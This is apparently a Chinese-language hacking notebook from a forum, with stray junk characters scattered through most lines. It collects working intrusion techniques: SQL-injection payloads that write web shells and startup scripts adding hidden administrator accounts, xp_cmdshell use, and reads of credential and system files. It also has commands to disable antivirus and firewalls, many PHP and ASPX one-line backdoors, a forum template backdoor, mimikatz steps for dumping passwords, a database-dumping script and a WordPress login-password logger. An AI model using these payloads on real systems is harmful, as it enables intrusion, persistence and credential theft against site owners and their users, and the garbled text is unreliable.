' {% o, ~# x+ d' U( sSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
, u- ?0 q8 R! v! [# Waccess中导出shell
! \: Q4 E# r2 Y0 k+ C+ j0 S! y$ w8 k
中文版本操作系统中针对mysql添加用户完整代码:! V* z9 H( x% `4 T7 F8 ^: I
1 U: }( s8 g( ?; Z  D6 C
use test;
+ t# r7 b+ R6 l5 s  f# A; d9 f, Tcreate table a (cmd text);  [" V. S3 d0 C: c' A" j) Y
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
7 d5 n0 C% d7 y3 D1 \- ?$ Q- ~! tinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
0 M$ `1 w5 E; d7 \0 F0 _  Zinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );* b5 j  d% X; l6 \2 p" I& K) g8 @
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
+ V" S3 D+ {& c! c, hdrop table a;& h7 {8 s7 D2 v. O/ ~

+ Y: E. B7 L5 D7 }英文版本:
# t* h& G+ Q" j' m0 z5 b- Y9 B* f* l9 @
use test;' v, r# z, x. F, N/ Q
create table a (cmd text);' E+ c+ t8 j0 \* Q# E# ]
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
& }* k' P1 }4 |/ W1 ~insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );! z7 q+ J1 ^9 V1 a. a! F0 `
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );* P3 ~/ B9 E2 h
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";: E- d2 O* S/ |0 U9 }: S
drop table a;; N1 Y+ B& E% ^

- d9 R1 d8 e, }3 Dcreate table a (cmd BLOB);. d9 O& P' A% j, n
insert into a values (CONVERT(木马的16进制代码,CHAR));
+ u6 ?* J( y- ], V, Y+ s$ g# Xselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'& S2 X( k3 O' ~- H3 G4 U
drop table a;9 P& [. Z! M' S) ~& S  V

0 T8 L$ ]; h1 Z# P8 Z4 X4 ~2 z, {记录一下怎么处理变态诺顿% O2 R. O$ m5 |' `/ f0 _2 u2 J$ A1 ]
查看诺顿服务的路径4 a; |$ t& ^2 P1 _0 B& y
sc qc ccSetMgr
8 S/ G, h: m5 s& l% A6 H然后设置权限拒绝访问。做绝一点。。
- Z) R" U3 w4 C" }9 kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system2 j; e6 X( t$ A# h
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"! p3 S0 K' T& p( w$ E9 m! N' Q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators9 g# ~8 K  b9 }. Z# T/ M
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
1 u9 _; j+ l  e8 O. U- p1 B
2 {$ s) ]' R- {9 \" C8 A2 E然后再重启服务器# u( y4 R0 k- y! z2 r2 v7 _1 x
iisreset /reboot: i/ Z  ?% Y! }
这样就搞定了。。不过完事后。记得恢复权限。。。。6 z; k  o+ I* V+ M2 k6 ~  S8 P
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F! U* c7 g& Q$ G  A  B( ?* c, R7 `
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F- u( ^7 q  u" W) `, S
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
9 Z  @# f8 X% f: _8 n# Pcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
! Z4 j2 v) R7 }$ P4 bSELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
+ u9 @# r  M3 O  M. `6 A1 ]- q
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
) r; E7 K8 X5 S" v' l1 e- d* D; T: a+ {! u: q- i- s" s" y
postgresql注射的一些东西
* f, u; x( |' b5 y( g- M如何获得webshell
1 n( h1 N$ g1 hhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); . l( X3 u  z8 p  N" L. o8 B" @
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); 2 A8 H1 U8 U: u3 R* B
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
- S! O' p4 G, m3 Q如何读文件
' Z4 T5 r5 x) Y9 W% dhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);6 K; v5 \" _* C
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
4 \& m7 z8 b9 F$ H" }0 I; R: Qhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
3 H, ~  p, X% l3 h( l. V6 M3 w/ y# n
2 z+ V7 r- D! |4 W  ?z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
+ }' j/ V; z: t1 R( K当然,这些的postgresql的数据库版本必须大于8.X
3 k# v' {5 G/ C& @# r9 k) k# E6 I$ W创建一个system的函数:* y8 a3 t$ d# e* ]& @
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT4 P, s, j$ G* a' X, P8 A: ^* q

+ d) @- e# c4 k7 }- D% s创建一个输出表:+ X5 ]" C4 p- _# t- d
CREATE TABLE stdout(id serial, system_out text)$ o6 {% l) d" W% J; T

! i& U% c9 O% r+ {7 F) c/ x执行shell,输出到输出表内:
% M6 K1 A8 ?4 {) g4 d3 d; WSELECT system('uname -a > /tmp/test')
/ C* t  r' }2 h3 O: u( D. J
3 R# O8 C) [$ h, L$ G6 O& K9 |copy 输出的内容到表里面;5 q. E' V0 O' N4 u
COPY stdout(system_out) FROM '/tmp/test'$ T: S: c  r# @7 y" d. W6 y9 Y

+ b: I# d# i+ ]1 n( s# t3 m从输出表内读取执行后的回显,判断是否执行成功
+ a& J& c+ X  s4 q: W( [! d$ ~
4 K0 s% B" q$ ]0 v* O" jSELECT system_out FROM stdout; p) }& J; k/ T
下面是测试例子
3 n# L' D: A' k$ o
4 h" J: Z! p7 ^/ J4 F3 r! G% ]/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- ' \# U' M: p2 n1 g; _! Y. }: q- h
9 h0 s, `" Q8 F. P$ S3 I0 u
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
, ?  Z9 ]/ n2 b  {4 v, dSTRICT --% Q7 |7 {; [* C4 \
# |/ @" @* z/ |1 g( n9 u
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
* D/ G4 a& @: ]( O: |2 W
% e1 ]1 [  b( a  [/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
8 q3 u6 |, P) ?7 ]
( n! |' y5 R8 j( {) `; F8 X/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
/ q* P/ {& J6 h( y) unet stop sharedaccess    stop the default firewall
! G9 P* \/ b1 Cnetsh firewall show      show/config default firewall8 ~; A" Z! w: s7 V
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
( f) W% F7 R/ S5 snetsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall
" c7 G: q/ D& ~$ H' {修改3389端口方法(修改后不易被扫出)
7 f$ i  }: R8 c- z修改服务器端的端口设置,注册表有2个地方需要修改
) o0 X5 l) d/ z& o
  c8 c& ?( i9 b: L- i9 q[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
% r9 T: H3 Q( O7 L; v% S' n/ s6 ePortNumber值,默认是3389,修改成所希望的端口,比如6000, v- Q6 {/ K5 v1 E
# P* x" w) N  O! _: I4 [% m6 X6 J
第二个地方:
3 o% X1 v3 W6 s1 ~' o! _: ?[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
9 [" w7 P$ m; f6 ^8 e8 P! gPortNumber值,默认是3389,修改成所希望的端口,比如6000. q1 m) ?& u. |7 Y
6 b+ _2 A% |0 D7 ~; k/ p4 e: t) e) {
现在这样就可以了。重启系统就可以了* `* H" R: U( a0 T6 r" B* d

* B: H" F+ R/ m4 J& C9 M查看3389远程登录的脚本3 v) b( \4 |; y4 @
保存为一个bat文件" ]* ~: X; E- w5 ]
date /t >>D:\sec\TSlog\ts.log  H& ^* N& N( N8 f
time /t >>D:\sec\TSlog\ts.log
  l; Z2 l4 T1 p* z0 m2 ]netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log: H* n( `- l9 S1 ?& Q2 `0 D
start Explorer) E8 e; X1 f: [

) a, v' e$ l3 j# h) qmstsc的参数:
( A* Z$ _* g9 u& m  \, }4 k7 X5 D* Y4 d
& V- T1 b+ Z" @& Z9 y1 t3 d+ I远程桌面连接
; M- q/ z& f% l2 b/ e2 x( C* C( o+ X; o0 V% S
MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
+ }* V/ R1 W8 E, A0 Y  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
$ M9 m) E* R8 Z1 q* ]' |  I9 I/ x& ?: F  F
<Connection File> -- 指定连接的 .rdp 文件的名称。
- x" {+ O, H  d) j
% S: T: P) V. L/v:<server[:port]> -- 指定要连接到的终端服务器。
, E1 P$ I  @/ C0 P8 ]5 A- u. J* ?2 z/ j9 @- x
/console -- 连接到服务器的控制台会话。0 J9 P4 n' j' i& z5 {: y
3 v* y5 ^) }4 }; d( q  E2 U8 Q0 t# W
/f -- 以全屏模式启动客户端。$ ^9 Z) T" I1 }+ {

( a. \% B$ l6 U: o% m/w:<width> --  指定远程桌面屏幕的宽度。8 ^6 }0 e( Q# d) m4 m; v" w5 t

% ]; v& y7 {6 X; ~3 y% j6 W9 ?. l; m/h:<height> -- 指定远程桌面屏幕的高度。6 I/ t' o7 O/ \/ U+ n9 z. P( ?2 G4 D3 z
6 v" s6 x0 c% D2 k$ M1 I. }& v; `
/edit -- 打开指定的 .rdp 文件来编辑。
$ B! P- i% j, Z+ b2 q  `: b  |6 ~: B4 K, p" X5 P
/migrate -- 将客户端连接管理器创建的旧版
. x. i- ~: x2 j8 P$ l连接文件迁移到新的 .rdp 连接文件。
! H0 P# v1 z5 J( o/ F. f0 ~2 I9 Q, D' T6 o$ U- A
& W2 H' z7 \+ J9 p0 S
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
! G7 x' l& E+ Z- V. Z3 `6 k( Dmstsc /console /v:124.42.126.xxx 突破终端访问限制数量" F7 o2 j- k) a$ s# G) q# ~
" O! C5 q  p; @- u3 _. {
命令行下开启3389
# A, O( \# c9 b( v& l0 Q0 l  rnet user asp.net aspnet /add
3 C% r3 A8 }9 F* B5 S& K  Cnet localgroup Administrators asp.net /add0 e- C( _  E% ^5 v' |* C
net localgroup "Remote Desktop Users" asp.net /add
. \# F& `. z) z0 W' V' oattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
" t7 Y; m" _- C% `+ s. Oecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 09 u! O  S4 g# k, P8 H
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1! e: \, X1 J1 B3 i
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
9 c" A3 e- {$ r! \  Usc config rasman start= auto6 Y' L9 |6 m0 Z: h
sc config remoteaccess start= auto- _' v6 z0 T1 H$ u0 ?# v
net start rasman: m) \1 Y9 _( G: u2 y7 T# o
net start remoteaccess+ e- r) e) r; J# L
Media
* {( ^2 ~& b" a  w2 A<form id="frmUpload" enctype="multipart/form-data"% B! o: p) e4 ?; a1 Z
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>: |& j* O) G2 @& e0 M# m
<input type="file" name="NewFile" size="50"><br>8 M7 v+ M; Z% c0 [7 ~% }2 z
<input id="btnUpload" type="submit" value="Upload">
$ x% T) t; D; b, q. u</form>5 \' \3 f; M6 x
0 F7 V& m! P, B
control userpasswords2 查看用户的密码
) o( b5 |8 I3 c8 m/ N- o, @: Raccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径! I' b" ]- m3 @4 P4 v  D
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a1 t1 ~! L: k8 S% {0 K

% y, ~8 F/ _0 r% j4 C5 A; l: J& s141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:. C2 j0 Y, @5 i/ v3 J: C
测试1:
! F4 Q( `# A2 E8 @) [SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
+ b! L* d0 j1 g& H  i$ w1 k5 Y
" j3 ]" L/ g  Z4 Q测试2:- @0 b: v) W5 S) `& ]- g, M

; O7 F% l& `" z7 A/ K$ d, bcreate table dirs(paths varchar(100),paths1 varchar(100), id int)$ W4 G% f& v& o5 X5 \

' J5 g( O+ o4 M+ n7 ?# Tdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--& ?5 x  e% B/ F! M: J$ h

( G2 b# P2 c- R, w2 P: E* L! [SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
' z* X  T5 T* ^2 q" p/ k9 u4 _, q, V关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
3 P& |. C! i! a$ p, o0 D, R6 R2 i! m可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
8 y% f/ v3 W2 }9 znet stop mcafeeframework
% \8 g) n" l9 i% e4 t7 Mnet stop mcshield% v9 |) j/ ?; U; z
net stop mcafeeengineservice9 q1 a2 k5 h8 Q6 }) C( t
net stop mctaskmanager
1 A( m$ P1 U5 b8 S  d( g* zhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D8 A. `% O1 e  T# B9 S. L

2 Q+ }+ T) u  r+ K  VNCDump.zip (4.76 KB, 下载次数: 1) $ A, ^+ e. z3 _' a+ u' }
密码在线破解http://tools88.com/safe/vnc.php
5 p0 |" G8 H9 A  h6 F; uVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
2 y3 c. z7 C! j2 ?5 ^6 |% ~: m3 n4 n+ ^  @* [$ u
exec master..xp_cmdshell 'net user'3 v- \7 `$ n+ w
mssql执行命令。2 I5 W  l  L" \; ?5 m9 n
获取mssql的密码hash查询
  _9 g& z; X# G2 S5 S: uselect name,password from master.dbo.sysxlogins3 A( }4 e: p+ X9 V! s

) ]0 l$ n2 z7 S" i5 P/ g1 F& S2 ^backup log dbName with NO_LOG;
: }% {3 N" G8 G" Pbackup log dbName with TRUNCATE_ONLY;) ~! e8 |% p1 Z! B# L5 q
DBCC SHRINKDATABASE(dbName);# e# B6 e+ b2 w6 `
mssql数据库压缩: p+ o. ]) J$ U# M
  d$ q- d. u$ z4 \) D
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
' g+ u4 W' J& G将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。2 i5 J% J2 L; c  i: y9 J, V
0 _& o% K* ?8 B1 m% J
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
! D# D. V" f7 g+ Z+ [, R备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak8 w1 C  k' R1 T; @
# B3 T- J7 \; u% m" h- q6 y
Discuz!nt35渗透要点:
, e1 ]& z( A5 {9 o(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default5 h* |1 X+ I  {
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
( A' D. t7 a: T: F(3)保存。9 ~- v1 h( Z7 I4 p2 l
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
$ }5 i% G8 h+ ?d:\rar.exe a -r d:\1.rar d:\website\2 C# O3 X0 `1 [
递归压缩website3 F: O" S" V3 n$ \) @
注意rar.exe的路径
% i$ w+ \  J# [& W. t5 ]& }" Y4 N& g
' i* Y4 I/ W& e- L$ k+ ^<?php/ @2 Z- |: `; {& `5 p

& i! H3 M- C+ s, R$ {; ?+ q5 c$telok   = "0${@eval($_POST[xxoo])}";+ f3 R" @6 ?6 X) \3 ^, Y

( f5 t+ A" X# x: J9 ?, F$username   = "123456";) W; H$ u& ^6 ?

& k3 k4 a! Z0 g5 _. q$userpwd   = "123456";
& n& ]( j& `& m; Y+ G3 e* k& X4 u
$ n3 u9 Z1 f- H( O$telhao   = "123456";
1 N( r2 J# L# @) j- G0 [8 @# z
8 f& N$ y, \9 w" V1 g$telinfo   = "123456";' d+ \% T3 {& I6 z  ]6 W$ y" t1 E

6 H2 m4 d1 L$ v) k/ i5 f, \+ H?>
+ c: Z+ Y" ?+ \) l* l1 d+ Qphp一句话未过滤插入一句话木马: Y" x3 Y6 m- Q. n5 x

3 A! {6 B6 V% U5 h8 w0 b! t4 X5 [7 z站库分离脱裤技巧
8 Y  e- q: T! K3 k, Q( \- Dexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
4 X# f+ P' C; ]2 t  Xexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
' E9 t4 g6 d3 G2 K( T条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。& U) |/ b* A1 q3 {2 w. f, ^
这儿利用的是马儿的专家模式(自己写代码)。
; Z; p! y4 P0 P  V2 C+ vini_set('display_errors', 1);( U1 p9 U6 B$ ]+ S. `$ W: D
set_time_limit(0);
7 n4 e, x/ _, d/ T" g8 A2 p/ qerror_reporting(E_ALL);
$ J( ?  I" S; v$ W9 D- @$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
/ T; l+ ?# u5 p& V2 f- z  Qmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());; n; {: O. R" r2 [
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
1 x/ W! c/ L4 X/ f$i = 0;
2 P6 H/ g$ ]2 W9 m; Y# ?$tmp = '';
# W4 H  K: V, R6 t5 u9 ^4 p0 Rwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {+ O& t% f2 i; O2 ]" v
    $i = $i+1;0 M! p4 s4 X+ O6 C8 q
    $tmp .=  implode("::", $row)."\n";' U! _5 |9 e9 e$ g. y) J
    if(!($i%500)){//500条写入一个文件
% U9 T- U) r( v, T7 S        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
1 q  q/ j) O* z1 x: v3 W' r3 B        file_put_contents($filename,$tmp);& g; n6 z4 y, N2 j+ v5 G
        $tmp = '';
0 M3 o$ ]4 g, L1 \! M    }; f- U" M! I& n
}0 |  A$ X+ n6 t; q
mysql_free_result($result);$ S& b6 Q: M) A4 e4 J
% y, t! l* o( V! O, l* i7 {$ A
! V/ G- K* c5 t) K; W" [; ~4 Y: v

7 A* y" [% z& b& h7 D//down完后delete% [! b' _* l4 n0 Q2 L

4 H# A) E9 t1 C* ?" [. M/ U* @& @2 E; ]* I% e: R4 u" r# E
ini_set('display_errors', 1);
. c: ?7 r: v+ `: [  U, ]9 ?$ p* H% j7 n6 verror_reporting(E_ALL);: j) ]1 o7 P$ s- w7 d" h
$i = 0;
* Y( C5 G+ R2 J1 o+ u3 h6 `6 uwhile($i<32) {
1 Y7 o5 m5 i( F' h5 b! H0 l' H    $i = $i+1;- Y0 _, ^' y, z7 J$ g
        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
0 ~0 c( @2 J9 b6 e* l+ W( S        unlink($filename);3 Z7 G9 p! y* K; ^& E( T
} : t1 v1 D/ p5 E
httprint 收集操作系统指纹
; K3 P8 O. M+ M0 S. e* e扫描192.168.1.100的所有端口0 \: j# u+ c* A  y" X- Q& R
nmap –PN –sT –sV –p0-65535 192.168.1.1002 g' o  x# f! J8 O; I/ y) F+ B) [
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
% Y6 ^& g" D) m+ p* chost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
$ c5 c6 h$ A4 P; C; q' k  X5 F+ n/ yNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
0 P3 r; q/ d- ^* Y, V! V* W0 k  m: e7 H) n% C$ c" M
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)+ B; K# y! X. S2 x

. G" j3 h  Z' J/ U# f- |  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
( ^; P& `( x: }$ F% ]$ T
7 a9 V, f( B  H% N; N  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x2 x6 h1 n+ B- B
- @% }- k' [+ X/ C
  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)0 ]6 E& P! p1 c7 ?+ b

2 P: Z( J; R( |  http://net-square.com/msnpawn/index.shtml (要求安装)7 M& T3 d4 O- W. U4 a# [
5 F  w1 X$ a( j$ i- a& ^' q& n+ C
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)& t4 \, l+ c3 F6 S$ P8 S
5 W6 L# ^6 \. Z5 G  d) x- E! I
  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
; G( P8 y( v7 H  Tset names gb23122 B3 b; r/ m- ]( D9 L7 J
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
7 F  R9 T5 h: x+ H1 p, {+ s9 ^. J+ l
mysql 密码修改
7 A4 D1 `1 q8 s3 |, L1 }UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ” ( E; }' y$ P5 M4 {! h2 K2 F  q7 Y8 X! @
update user set password=PASSWORD('antian365.com') where user='root';7 t2 @. z) K8 d" X- X0 `
flush privileges;5 k  Q, Q& z, y7 K/ B
高级的PHP一句话木马后门
$ m9 A+ q! F& [. J4 I% u
5 J% Y8 H+ `" m. h入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
; ]* I3 m9 z! q6 H8 K, B! ~; G! k* ?8 z; R0 F! ?) U/ {3 P: a
1、5 q) P8 v  D9 k

8 r% |+ J, w# p- S! |' R$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";; l/ T8 A: R" F# U
' F( f  }: b' X; [) O  p
$hh("/[discuz]/e",$_POST['h'],"Access");7 O" v6 C" F: W  m% Z: ~

# q0 d9 M2 h1 ?& k//菜刀一句话
- i5 T, |. w+ C# U. k# U5 e  B, \5 k8 A
2、
+ E2 k6 U4 |( }
/ N3 \( u/ I* k$filename=$_GET['xbid'];
7 F' S9 U8 M7 ]) \/ `! A' d# v0 \' z  ~/ n
include ($filename);
8 z0 L* G7 q$ F& Y- G; ]6 s2 e7 c3 c, D1 s
//危险的include函数,直接编译任何文件为php格式运行5 x. D# A6 U. X* [8 {
, s! _2 B$ [' G. U3 b; \
3、
; B0 k% k1 |$ B
) f1 {8 N; I+ w6 [" G$reg="c"."o"."p"."y";
/ G. [; l& e2 b9 Q9 c/ ?
/ h: J: q! [8 g$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);; a4 Q- ]& k4 Q$ K# }/ r
& _9 J2 A/ a8 H% e1 R
//重命名任何文件
1 ]( X! K& @2 ^$ A$ R" G6 M2 e" I' P. T4 L" g
4、
; X& C/ Q9 J7 t& u' T: ?$ g+ s
9 l8 s$ p: h6 J6 X" b$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";& Y$ ?2 Q) A# J! \% Z5 o4 @- S( C! G
( O# K/ ]. U" S8 R; k& M
$gzid("/[discuz]/e",$_POST['h'],"Access");
6 I' h- T; T5 i8 M7 ~* H% m4 m+ Y7 g/ n( i; K  p/ B2 E
//菜刀一句话6 K  t  ]+ m, A8 f! S
/ n; t- P6 Y6 S$ e! q3 k" J
5、include ($uid);
- u, H. e* w  @8 x8 l
" q- m' F2 C  N1 c4 Y' B//危险的include函数,直接编译任何文件为php格式运行,POST - V& P! Q( c, X

3 B( N$ O( b6 k: `' Y! ]
- J" Q6 s7 y% A( C, N- h8 m//gif插一句话! S) ~2 l" \0 Y+ H+ ?* g2 i; T

3 a, ]' w! A2 l) L, L- D- v6、典型一句话) G% M; o) i8 O; J9 S% n, s5 i) O
6 \, ?3 G& `6 S# t; A7 Y
程序后门代码
8 x7 o4 W. L1 s# w4 P/ y<?php eval_r($_POST[sb])?>( }% n  r: x' D( ~
程序代码- l  f% I& g6 b1 U8 z7 N; K* B0 x! B1 J
<?php @eval_r($_POST[sb])?>3 D) o6 ^" c! m9 f7 l$ z5 P; W9 `( B
//容错代码! v  B( d6 D0 V) v: j/ ?
程序代码
! g5 t4 P. c7 ?( _! P0 b<?php assert($_POST[sb]);?>: l- R& P# U: v, M
//使用lanker一句话客户端的专家模式执行相关的php语句
4 I" ?$ U( i( ?4 P+ Q  s: q程序代码$ S9 F2 M7 g3 Q3 s$ V+ X3 f
<?$_POST['sa']($_POST['sb']);?>
4 S! T# e! |+ b0 o  y0 X3 I9 n程序代码
% d9 t  C3 B& j2 b& J0 t<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>- U9 r& V1 S1 m
程序代码2 f7 c1 B) m* j: n- e8 L3 C
<?php
  h7 \8 [4 o& |4 x7 G4 `1 x+ q0 k@preg_replace("/[email]/e",$_POST['h'],"error");" k6 U4 ?, F  ~0 K/ ?7 s
?>
7 a" I' F. v! _- D6 O; Q//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
1 \* p4 _  k- h( x4 \3 }; d( U# y; F程序代码
4 [, k0 w. E% h$ n<O>h=@eval_r($_POST[c]);</O>  z# ?8 V( K$ S& y, O9 T
程序代码
  _; H5 W1 K$ m7 }<script language="php">@eval_r($_POST[sb])</script>
6 k  T0 z' d! W/ T! U8 a//绕过<?限制的一句话% _7 M) d) H7 ?$ [# d- N9 E3 ?

, C. [+ T8 x) P1 c$ n+ Nhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
" k% ^" e3 y4 ^1 Y详细用法:; L4 v7 Y8 ~3 q$ T2 v
1、到tools目录。psexec \\127.0.0.1 cmd
$ B0 {2 J' g- ], S- ~2、执行mimikatz4 W. g% }$ k  E3 ]9 [0 |
3、执行 privilege::debug$ t: [  c5 Q* _7 O+ S
4、执行 inject::process lsass.exe sekurlsa.dll: _4 P/ m) ], u2 j
5、执行@getLogonPasswords6 G: V0 F: f' M9 Z6 _) M- B
6、widget就是密码
& O) |* x7 b+ y2 \' z; {' y7、exit退出,不要直接关闭否则系统会崩溃。' s6 a' y3 S( p: Z

- M( Z2 L4 v7 R% u! w* Fhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面; e+ F5 P/ {. ~9 r
: D: u  I' T8 i
自动查找系统高危补丁0 k3 z: g( f5 c: e5 n+ T
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt) H2 T8 C& h& ~, y0 X; g6 p

  J3 ?* x# Y* t- y. k突破安全狗的一句话aspx后门
& D8 g# w4 S9 A- f5 D" H5 f<%@ Page Language="C#" ValidateRequest="false" %>: Q9 |8 `" Z3 C- z
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
5 V: P1 z& N7 U, kwebshell下记录WordPress登陆密码
/ ?% ^0 s: m! D7 }6 A9 Gwebshell下记录Wordpress登陆密码方便进一步社工
3 A1 H3 l+ A; v" Y0 z& i7 j5 B在文件wp-login.php中539行处添加:
) U! o* d! ^% M; ^! V" Z$ W1 Y// log password
1 m+ w% t1 h1 u; L1 i& i$log_user=$_POST['log'];' h! a+ o) m0 o' D$ b: q% X- x) j
$log_pwd=$_POST['pwd'];& a) t* a# c% W2 z0 S
$log_ip=$_SERVER["REMOTE_ADDR"];0 m, R: ~$ [& `0 }/ R
